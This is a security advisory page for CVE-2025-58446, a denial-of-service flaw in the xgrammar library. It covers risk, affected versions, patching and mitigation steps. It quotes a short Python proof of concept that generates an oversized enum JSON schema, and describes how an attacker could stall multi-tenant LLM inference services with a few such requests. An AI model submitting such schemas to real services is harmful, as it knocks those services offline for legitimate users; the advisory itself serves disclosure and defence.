CVE-2025-58446: xgrammar: DoS via oversized JSON schema grammar parsing
GHSA-9q5r-wfvf-rr7f MEDIUM PoC AVAILABLE CISA: TRACK*xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.
Risk Assessment
Effective risk is medium-high for exposed inference endpoints, despite the medium CVSS. The attack surface is any API that accepts caller-supplied JSON schemas for structured generation — a common pattern in agentic and enterprise LLM deployments. EPSS is very low (0.00091), suggesting no current active exploitation, but the PoC is fully public and requires zero AI/ML expertise to execute. Impact is availability, not confidentiality — a single malicious request can monopolize an inference thread for minutes, enabling throughput starvation against multi-tenant or high-availability deployments.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| xgrammar | pip | = 0.1.23 | 0.1.24 |
Do you use xgrammar? You're affected.
Severity & Risk
Recommended Action
5 steps-
Patch
Upgrade xgrammar to v0.1.24 or later — the fix optimizes the grammar optimizer and disables slow paths for large grammars.
-
Short-term workaround
Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema().
-
Rate limiting
Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits.
-
Detection
Alert on grammar parsing durations exceeding 10 seconds — this is anomalous and indicative of exploitation.
-
Audit exposure
Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2025-58446?
xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.
Is CVE-2025-58446 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2025-58446, increasing the risk of exploitation.
How to fix CVE-2025-58446?
1. **Patch**: Upgrade xgrammar to v0.1.24 or later — the fix optimizes the grammar optimizer and disables slow paths for large grammars. 2. **Short-term workaround**: Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema(). 3. **Rate limiting**: Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits. 4. **Detection**: Alert on grammar parsing durations exceeding 10 seconds — this is anomalous and indicative of exploitation. 5. **Audit exposure**: Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.
What systems are affected by CVE-2025-58446?
This vulnerability affects the following AI/ML architecture patterns: model serving, structured output pipelines, LLM inference APIs, agentic tool-calling pipelines.
What is the CVSS score for CVE-2025-58446?
No CVSS score has been assigned yet.
Technical Details
NVD Description
### Summary Provided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser. ### Details Full reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers. ### Patch This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars. Thanks to @Seven-Streams ### PoC ``` import string import random def enum_schema(size=10000,str_len=10): enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]} schema = { "definitions": { "colorEnum": enum }, "type": "object", "properties": { "color1": { "$ref": "#/definitions/colorEnum" }, "color2": { "$ref": "#/definitions/colorEnum" }, "color3": { "$ref": "#/definitions/colorEnum" }, "color4": { "$ref": "#/definitions/colorEnum" }, "color5": { "$ref": "#/definitions/colorEnum" }, "color6": { "$ref": "#/definitions/colorEnum" }, "color7": { "$ref": "#/definitions/colorEnum" }, "color8": { "$ref": "#/definitions/colorEnum" } }, "required": [ "color1", "color2" ] } return schema schema_enum = enum_schema() print(schema_enum) print(test_schema(schema_enum, {})) ``` where: ``` def test_schema(schema, instance): grammar = xgr.Grammar.from_json_schema( json.dumps(schema), strict_mode=True ) return _is_grammar_accept_string(grammar, json.dumps(instance)) ``` ### Impact DOS
Exploitation Scenario
An adversary targeting a multi-tenant LLM API (e.g., an enterprise copilot or structured data extraction service) crafts a JSON schema with thousands of enum values totaling over 100k characters — trivially generated with the public PoC. They submit this as the response_format schema in a constrained generation request. The xgrammar optimizer enters a slow computation path, blocking the inference thread for several minutes. By issuing a small number of concurrent requests (5–10), the attacker can saturate all inference workers, causing complete service unavailability for legitimate users. The attack costs pennies in compute and requires no authentication bypass or specialized knowledge, only awareness of the library version and the public PoC.
Weaknesses (CWE)
References
- github.com/advisories/GHSA-9q5r-wfvf-rr7f
- github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27
- github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f
- nvd.nist.gov/vuln/detail/CVE-2025-58446
- github.com/ARPSyndicate/cve-scores Exploit
- github.com/fkie-cad/nvd-json-data-feeds Exploit
Timeline
Related Vulnerabilities
CVE-2025-57809 7.5 xgrammar: uncontrolled recursion in grammar parsing causes DoS
Same package: xgrammar CVE-2025-32381 6.5 xgrammar: unbounded grammar cache causes LLM server DoS
Same package: xgrammar CVE-2026-25048 xgrammar: security flaw enables exploitation
Same package: xgrammar CVE-2026-33660 10.0 TensorFlow: type confusion NPD in tensor conversion
Same attack type: DoS CVE-2022-35939 9.8 TensorFlow: ScatterNd OOB write enables RCE/crash
Same attack type: DoS
AI Threat Alert